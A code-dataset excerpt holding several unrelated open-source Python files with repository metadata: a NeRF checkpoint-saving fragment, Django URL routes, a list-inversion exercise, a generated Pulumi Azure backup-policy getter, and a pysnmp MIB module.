show_img=show_img*255
logger.add_image('val/show_images_%d' % n, show_img.byte(), epoch)
logger.add_scalar('val/loss',val_loss)
logger.add_scalar('val/psnr',psnr_)
print("save models")
base_path = hparams.check_dir
model_path = os.path.join(base_path,'corase_sigma_%d.pt' % epoch)
torch.save(corase_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'corase_albedo_%d.pt' % epoch)
torch.save(corase_Nerf_albedo.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_sigma_%d.pt' % epoch)
torch.save(fine_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_albedo_%d.pt' % epoch)
torch.save(fine_Nerf_albedo.state_dict(), model_path)
| [
"[email protected]"
] | |
bb66bf071a75efcfd3911bfff82f02abb6f859f3 | d8183ea32f7e041dc4094cb955c075586bf66b73 | /subscriptions/api/urls.py | b63a5e68b48dfb2f6ec1e280cb64cdad63d00b63 | [
"BSD-2-Clause"
] | permissive | mjumbewu/django-subscriptions | e8426ff510f06268c3f4151e7d71ffad59fa115b | 78a35742ec5062380aded053b64fd96cba677dac | refs/heads/master | 2016-09-05T18:03:22.761915 | 2013-04-01T18:05:08 | 2013-04-01T18:05:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from django.conf.urls.defaults import patterns, include, url
from subscriptions.api.views import SubscriptionIndex, ContentFeedRecordIndex
urlpatterns = patterns('',
url('^subscriptions/$', SubscriptionIndex.as_view()),
url('^feed_records/$', ContentFeedRecordIndex.as_view()),
)
| [
"[email protected]"
] | |
9cdaad47d5357ac4e8efec69e5a276d9740b076e | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Python_fundamentals/Lists_basics/InvertValues.py | 4f376e4458c8f0257c55551b39bf912e393e5243 | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | string = input()
list_of_string = string.split(' ')
reverse_list = []
for i in range(len(list_of_string)):
reverse_list.append(int(list_of_string[i]) * -1)
print(reverse_list)
| [
"[email protected]"
] | |
508adf8642b9920d2152095cd5a761b3ab2e54c0 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/recoveryservices/v20210201/get_protection_policy.py | ecf4c141423f4c2b9f265781df528fc03ccf1e76 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,829 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetProtectionPolicyResult',
'AwaitableGetProtectionPolicyResult',
'get_protection_policy',
'get_protection_policy_output',
]
@pulumi.output_type
class GetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> Any:
"""
ProtectionPolicyResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetProtectionPolicyResult(GetProtectionPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetProtectionPolicyResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_protection_policy(policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['policyName'] = policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20210201:getProtectionPolicy', __args__, opts=opts, typ=GetProtectionPolicyResult).value
return AwaitableGetProtectionPolicyResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_protection_policy)
def get_protection_policy_output(policy_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
vault_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetProtectionPolicyResult]:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
...
| [
"[email protected]"
] | |
be11b741bfcdd7a38ab0381a2686283f96a1864b | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/PCUBE-SMI.py | 057c4bae47ebfa759260a8448e4e0cd9d353529d | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 3,457 | py | #
# PySNMP MIB module PCUBE-SMI (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/PCUBE-SMI
# Produced by pysmi-0.3.4 at Wed May 1 12:11:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, ObjectIdentity, iso, Counter32, Unsigned32, Counter64, Integer32, ModuleIdentity, TimeTicks, Gauge32, IpAddress, MibIdentifier, Bits, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "ObjectIdentity", "iso", "Counter32", "Unsigned32", "Counter64", "Integer32", "ModuleIdentity", "TimeTicks", "Gauge32", "IpAddress", "MibIdentifier", "Bits", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
pcube = ModuleIdentity((1, 3, 6, 1, 4, 1, 5655))
pcube.setRevisions(('2002-01-14 20:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: pcube.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: pcube.setLastUpdated('200201142000Z')
if mibBuilder.loadTexts: pcube.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: pcube.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: [email protected]')
if mibBuilder.loadTexts: pcube.setDescription('The Structure of Management Information for the Pcube enterprise.')
pcubeProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 1))
if mibBuilder.loadTexts: pcubeProducts.setStatus('current')
if mibBuilder.loadTexts: pcubeProducts.setDescription('pcubeProducts is the root OBJECT IDENTIFIER from which sysObjectID values are assigned. Actual values are defined in PCUBE-PRODUCTS-MIB.')
pcubeModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 2))
if mibBuilder.loadTexts: pcubeModules.setStatus('current')
if mibBuilder.loadTexts: pcubeModules.setDescription('pcubeModules provides a root object identifier from which MODULE-IDENTITY values may be assigned.')
pcubeMgmt = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 3))
if mibBuilder.loadTexts: pcubeMgmt.setStatus('current')
if mibBuilder.loadTexts: pcubeMgmt.setDescription('pcubeMgmt is the main subtree for new MIB development.')
pcubeWorkgroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 4))
if mibBuilder.loadTexts: pcubeWorkgroup.setStatus('current')
if mibBuilder.loadTexts: pcubeWorkgroup.setDescription("pcubeWorkgroup is the main subtree for objects and events of P-Cube's products.")
mibBuilder.exportSymbols("PCUBE-SMI", PYSNMP_MODULE_ID=pcube, pcubeMgmt=pcubeMgmt, pcubeProducts=pcubeProducts, pcubeModules=pcubeModules, pcubeWorkgroup=pcubeWorkgroup, pcube=pcube)
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.